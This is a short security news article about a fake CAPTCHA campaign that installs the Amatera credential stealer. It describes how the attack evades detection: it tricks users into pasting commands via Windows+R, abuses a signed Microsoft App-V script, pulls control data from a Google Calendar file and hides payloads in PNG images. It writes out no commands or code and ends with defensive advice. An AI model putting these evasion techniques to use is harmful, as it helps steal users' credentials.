New Fake CAPTCHA Scam Abuses Microsoft Tools to Install Amatera Stealer

Fake CAPTCHA scams have evolved beyond simple visual puzzles, now coercing users into running system commands. By embedding malicious instructions within a familiar "I am not a robot" prompt, attackers exploit human curiosity and trust. The use of a Windows+R shortcut combined with a copy‑paste code sequence turns an ordinary user action into a silent infection vector, highlighting the growing sophistication of social engineering tactics that blend UI manipulation with legitimate operating‑system utilities.

The core of this campaign relies on a living‑off‑the‑land binary, SyncAppvPublishingServer.vbs, a signed Microsoft script normally used for App‑V management. Because the binary is trusted, many endpoint protection platforms overlook its activity. Further obfuscation comes from fetching command‑and‑control data from a public Google Calendar .ics file and hiding the actual payload inside innocuous PNG images through steganography. This multi‑layered approach—leveraging cloud services, legitimate scripts, and image files—creates a low‑profile delivery chain that can slip past sandbox analysis and traditional signature‑based detection.

For security teams, the incident underscores the need for stricter execution policies and application whitelisting, especially for LOLBins and script hosts. Monitoring for anomalous use of Windows+R, unexpected calendar subscriptions, or unusual image downloads can provide early indicators. Educating users to avoid copying commands from unverified sources remains a critical defense. As attackers continue to weaponize trusted tools and services, a blend of behavioral analytics, strict script controls, and user awareness will be essential to counter these covert credential‑stealing operations.